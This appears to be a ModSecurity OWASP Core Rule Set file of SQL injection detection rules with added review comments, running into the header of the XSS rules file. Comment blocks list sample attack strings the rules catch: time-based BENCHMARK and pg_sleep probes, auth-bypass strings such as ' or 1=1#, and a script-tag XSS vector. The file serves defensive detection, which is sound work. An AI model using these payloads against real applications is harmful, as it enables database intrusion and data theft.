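# and XML content. Tune by editing that quantifier (there is no @ge operator
# in these rules).
# The class includes characters that are routine in benign data
# ( - : = & ( ) ' ), so timestamps, URLs and free-form text reach 4 quickly;
# prefer per-parameter exclusions for known free-text fields over raising the
# threshold globally.
# logdata uses %{TX.0} (the whole matched run). With a repeated capture group
# TX.1 only holds the last repetition, which under-reports what matched and
# disagreed with the tx.0 value stored by the final setvar.
# The cookie rule listed the !REQUEST_COOKIES:/__utm/ exclusion twice; it is
# listed once here, which selects the same variables.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES "([\~\!\@\#\$\%\^\&\*\(\)\-\+\=\{\}\[\]\|\:\;\"\'\´\’\‘\`\<\>].*?){8,}" \
        "phase:2,t:none,t:urlDecodeUni,block,id:'981172',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',msg:'Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESTRICTED_SQLI_CHARS-%{matched_var_name}=%{tx.0}"

SecRule ARGS_NAMES|ARGS|XML:/* "([\~\!\@\#\$\%\^\&\*\(\)\-\+\=\{\}\[\]\|\:\;\"\'\´\’\‘\`\<\>].*?){4,}" \
        "phase:2,t:none,t:urlDecodeUni,block,id:'981173',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',msg:'Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded',capture,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESTRICTED_SQLI_CHARS-%{matched_var_name}=%{tx.0}"

#
# -=[ PHPIDS - Converted SQLI Filters ]=-
#
# https://dev.itratos.de/projects/php-ids/repository/raw/trunk/lib/IDS/default_filter.xml
#
#
# Example Payloads Detected:
# -------------------------
# IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
# SELECT pg_sleep(10);
# IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
# select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
# -------------------------
#
# Time-based probe detection: sleep(<optional digits>) or benchmark(<a>,<b>)
# anywhere in the URL-decoded value, case-insensitive.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(sleep\((\s*?)(\d*?)(\s*?)\)|benchmark\((.*?)\,(.*?)\)))"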
"phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects blind sqli tests using sleep() or benchmark().',id:'981272',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" # # Example Payloads Detected: # ------------------------- # ' or 1=1# # ') or ('1'='1-- # 1 OR \'1\'!=0 # aaa\' or (1)=(1) #!asd # aaa\' OR (1) IS NOT NULL #!asd # ' =+ ' # asd' =- (-'asd') -- -a # aa" =+ - "0 # aa' LIKE 0 -- -a # aa' LIKE md5(1) or '1 # asd"or-1="-1 # asd"or!1="!1 # asd"or!(1)="1 # asd" or ascii(1)="49 # asd' or md5(5)^'1 # \"asd" or 1="1 # ' or id= 1 having 1 #1 ! # ' or id= 2-1 having 1 #1 ! # aa'or BINARY 1= '1 # aa'like-'aa # ------------------------- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?i:\d[\"'`´’‘]\s+[\"'`´’‘]\s+\d)|(?:^admin\s*?[\"'`´’‘]|(\/\*)+[\"'`´’‘]+\s?(?:--|#|\/\*|{)?)|(?:[\"'`´’‘]\s*?\b(x?or|div|like|between|and)\b\s*?[+<>=(),-]\s*?[\d\"'`´’‘])|(?:[\"'`´’‘]\s*?[^\w\s]?=\s*?[\"'`´’‘])|(?:[\"'`´’‘]\W*?[+=]+\W*?[\"'`´’‘])|(?:[\"'`´’‘]\s*?[!=|][\d\s!=+-]+.*?[\"'`´’‘(].*?$)|(?:[\"'`´’‘]\s*?[!=|][\d\s!=]+.*?\d+$)|(?:[\"'`´’‘]\s*?like\W+[\w\"'`´’‘(])|(?:\sis\s*?0\W)|(?:where\s[\s\w\.,-]+\s=)|(?:[\"'`´’‘][<>~]+[\"'`´’‘]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects basic SQL authentication bypass attempts 1/3',id:'981244',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule 
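REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\sexec\s+xp_cmdshell)|(?:[\"'`´’‘]\s*?!\s*?[\"'`´’‘\w])|(?:from\W+information_schema\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\s*?\([^\)]*?)|(?:[\"'`´’‘];?\s*?(?:select|union|having)\s*?[^\s])|(?:\wiif\s*?\()|(?:exec\s+master\.)|(?:union select @)|(?:union[\w(\s]*?select)|(?:select.*?\w?user\()|(?:into[\s+]+(?:dump|out)file\s*?[\"'`´’‘]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MSSQL code execution and information gathering attempts',id:'981255',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'"

# Comma/quote sequences, "select ... from" and keyword( space( forms.
# The second alternative (\Wselect.+\W*?from) is broad; free-text fields that
# contain both words will score critical here.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:,.*?[)\da-f\"'`´’‘][\"'`´’‘](?:[\"'`´’‘].*?[\"'`´’‘]|\Z|[^\"'`´’‘]+))|(?:\Wselect.+\W*?from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*?\(\s*?space\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL comment-/space-obfuscated injections and backtick termination',id:'981257',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'"

# Stacked/chained statement fragments: "@x = (select", numeric boolean
# chains, "; drop|alter", "; update|insert", "SET @var".
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:@.+=\s*?\(\s*?select)|(?:\d+\s*?(x?or|div|like|between|and)\s*?\d+\s*?[\-+])|(?:\/\w+;?\s+(?:having|and|x?or|div|like|between|and|select)\W)|(?:\d\s+group\s+by.+\()|(?:(?:;|#|--)\s*?(?:drop|alter))|(?:(?:;|#|--)\s*?(?:update|insert)\s*?\w{2,})|(?:[^\w]SET\s*?@\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\|\||\&\&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`´’‘=()]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects chained SQL injection attempts 1/2',id:'981248',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'"

# Boundary-value probe detection: the whole URL-decoded value (anchored with
# ^ and $) must equal one of the listed integer-limit or float-limit literals.
# The float alternative previously read "2.2.80738585072007e-308". That string
# is what a release-time replace of a "2.2.x" version pattern (with unescaped
# dots) to "2.2.8" produces from 2.2250738585072007e-308, and in that form the
# alternative could not match the value the msg describes, so the check was
# silently dead. The constant is restored here and its dot escaped so the
# alternative matches only that exact literal; msg is corrected to agree.
# Re-check this literal after any bulk version bump of the rule files.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2\.2250738585072007e-308|1e309)$))" \
        "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash',id:'981277',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'"

# "select" or ";" followed by benchmark( / if( / sleep( with an argument.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(select|;)\s+(?:benchmark|if|sleep)\s*?\(\s*?\(?\s*?\w+))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects SQL benchmark and sleep injection attempts including conditional queries',id:'981250',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within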
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\s()]case\s*?\()|(?:\)\s*?like\s*?\()|(?:having\s*?[^\s]+\s*?[^\w\s])|(?:if\s?\([\d\w]\s*?[=<>~]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects conditional SQL injection attempts',id:'981241',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:alter\s*?\w+.*?character\s+set\s+\w+)|([\"'`´’‘];\s*?waitfor\s+time\s+[\"'`´’‘])|(?:[\"'`´’‘];.*?:\s*?goto))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL charset switch and MSSQL DoS attempts',id:'981252',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:merge.*?using\s*?\()|(execute\s*?immediate\s*?[\"'`´’‘])|(?:\W+\d*?\s*?having\s*?[^\s\-])|(?:match\s*?[\w(),+-]+\s*?against\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections',id:'981256',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: 
%{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:union\s*?(?:all|distinct|[(!@]*?)?\s*?[([]*?\s*?select\s+)|(?:\w+\s+like\s+[\"'`´’‘])|(?:like\s*?[\"'`´’‘]\%)|(?:[\"'`´’‘]\s*?like\W*?[\"'`´’‘\d])|(?:[\"'`´’‘]\s*?(?:n?and|x?x?or|div|like|between|and|not |\|\||\&\&)\s+[\s\w]+=\s*?\w+\s*?having\s+)|(?:[\"'`´’‘]\s*?\*\s*?\w+\W+[\"'`´’‘])|(?:[\"'`´’‘]\s*?[^?\w\s=.,;)(]+\s*?[(@\"'`´’‘]*?\s*?\w+\W+\w)|(?:select\s+?[\[\]()\s\w\.,\"'`´’‘-]+from\s+)|(?:find_in_set\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects basic SQL authentication bypass attempts 2/3',id:'981245',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(union(.*?)select(.*?)from)))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Looking for basic sql injection. 
Common attack string for mysql, oracle and others.',id:'981276',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:select\s*?pg_sleep)|(?:waitfor\s*?delay\s?[\"'`´’‘]+\s?\d)|(?:;\s*?shutdown\s*?(?:;|--|#|\/\*|{)))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts',id:'981254',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\[\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|x?or|div|like|between|and)\]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Finds basic MongoDB SQL injection attempts',id:'981270',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* 
"(?i:(?:\)\s*?when\s*?\d+\s*?then)|(?:[\"'`´’‘]\s*?(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*?\(\s*?\d)|(?:(?:(n?and|x?x?or|div|like|between|and|not)\s+|\|\||\&\&)\s*?\w+\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL comments, conditions and ch(a)r injections',id:'981240',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\"'`´’‘]\s+and\s*?=\W)|(?:\(\s*?select\s*?\w+\s*?\()|(?:\*\/from)|(?:\+\s*?\d+\s*?\+\s*?@)|(?:\w[\"'`´’‘]\s*?(?:[-+=|@]+\s*?)+[\d(])|(?:coalesce\s*?\(|@@\w+\s*?[^\w\s])|(?:\W!+[\"'`´’‘]\w)|(?:[\"'`´’‘];\s*?(?:if|while|begin))|(?:[\"'`´’‘][\s\d]+=\s*?\d)|(?:order\s+by\s+if\w*?\s*?\()|(?:[\s(]+case\d*?\W.+[tw]hen[\s(]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects chained SQL injection attempts 2/2',id:'981249',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:procedure\s+analyse\s*?\()|(?:;\s*?(declare|open)\s+[\w-]+)|(?:create\s+(procedure|function)\s*?\w+\s*?\(\s*?\)\s*?-)|(?:declare[^\w]+[@#]\s*?\w+)|(exec\s*?\(\s*?@))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL and PostgreSQL stored procedure/function injections',id:'981253',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\"'`´’‘]\s*?(x?or|div|like|between|and)\s*?[\"'`´’‘]?\d)|(?:\\\\x(?:23|27|3d))|(?:^.?[\"'`´’‘]$)|(?:(?:^[\"'`´’‘\\\\]*?(?:[\d\"'`´’‘]+|[^\"'`´’‘]+[\"'`´’‘]))+\s*?(?:n?and|x?x?or|div|like|between|and|not|\|\||\&\&)\s*?[\w\"'`´’‘][+&!@(),.-])|(?:[^\w\s]\w+\s*?[|-]\s*?[\"'`´’‘]\s*?\w)|(?:@\w+\s+(and|x?or|div|like|between|and)\s*?[\"'`´’‘\d]+)|(?:@[\w-]+\s(and|x?or|div|like|between|and)\s*?[^\w\s])|(?:[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`´’‘].)|(?:\Winformation_schema|table_name\W))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects classic SQL injection probings 1/2',id:'981242',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:in\s*?\(+\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\|\||\&\&)\s+[\s\w+]+(?:regexp\s*?\(|sounds\s+like\s*?[\"'`´’‘]|[=\d]+x))|([\"'`´’‘]\s*?\d\s*?(?:--|#))|(?:[\"'`´’‘][\%&<>^=]+\d\s*?(=|x?or|div|like|between|and))|(?:[\"'`´’‘]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`´’‘])|(?:[\"'`´’‘]\s*?is\s*?\d.+[\"'`´’‘]?\w)|(?:[\"'`´’‘]\|?[\w-]{3,}[^\w\s.,]+[\"'`´’‘])|(?:[\"'`´’‘]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`´’‘]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects basic SQL authentication bypass attempts 3/3',id:'981246',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:create\s+function\s+\w+\s+returns)|(?:;\s*?(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*?[\[(]?\w{2,}))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL UDF injection and other data/structure manipulation attempts',id:'981251',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\d\W]\s+as\s*?[\"'`´’‘\w]+\s*?from)|(?:^[\W\d]+\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s+(?:(?:group_)concat|char|load_file)\s?\(?)|(?:end\s*?\);)|([\"'`´’‘]\s+regexp\W)|(?:[\s(]load_file\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects concatenated basic SQL injection and SQLLFI attempts',id:'981247',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* 
"(?i:(?:[\"'`´’‘]\s*?\*.+(?:x?or|div|like|between|and|id)\W*?[\"'`´’‘]\d)|(?:\^[\"'`´’‘])|(?:^[\w\s\"'`´’‘-]+(?<=and\s)(?<=or|xor|div|like|between|and\s)(?<=xor\s)(?<=nand\s)(?<=not\s)(?<=\|\|)(?<=\&\&)\w+\()|(?:[\"'`´’‘][\s\d]*?[^\w\s]+\W*?\d\W*?.*?[\"'`´’‘\d])|(?:[\"'`´’‘]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`´’‘])|(?:[\"'`´’‘]\s*?[^\w\s]+\s*?[\W\d].*?(?:#|--))|(?:[\"'`´’‘].*?\*\s*?\d)|(?:[\"'`´’‘]\s*?(x?or|div|like|between|and)\s[^\d]+[\w-]+.*?\d)|(?:[()\*<>%+-][\w-]+[^\w\s]+[\"'`´’‘][^,]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects classic SQL injection probings 2/2',id:'981243',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_41_xss_attacks.conf�������������0000664�0000000�0000000�00000274707�12164572564�0031671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# -=[ XSS Filters - Category 1 ]=-
# script tag based XSS vectors, e.g., <script> alert(1)</script>
#
# Rule 973336 inspects ARGS only (not cookies, argument names or XML, which
# the keyword rules further down also cover). Input is normalised with
# urlDecodeUni, htmlEntityDecode, jsDecode and cssDecode before matching.
# On a match it logs, captures the match into TX.0 and adds
# tx.critical_anomaly_score to both tx.xss_score and tx.anomaly_score.
# No disruptive action (block/deny/pass) is listed here, so what happens to
# the request depends on the SecDefaultAction in effect for phase 2.
#
# NOTE(review): every alternative starts with <script[^>]*> and the last
# alternative ends in a lazy [\s\S]*? that can match nothing, so an opening
# script tag alone decides whether the rule fires; the closing-tag
# alternatives only change what is captured into TX.0 and logged.
# NOTE(review): "[[\s\S]]*" in the second alternative reads as the class
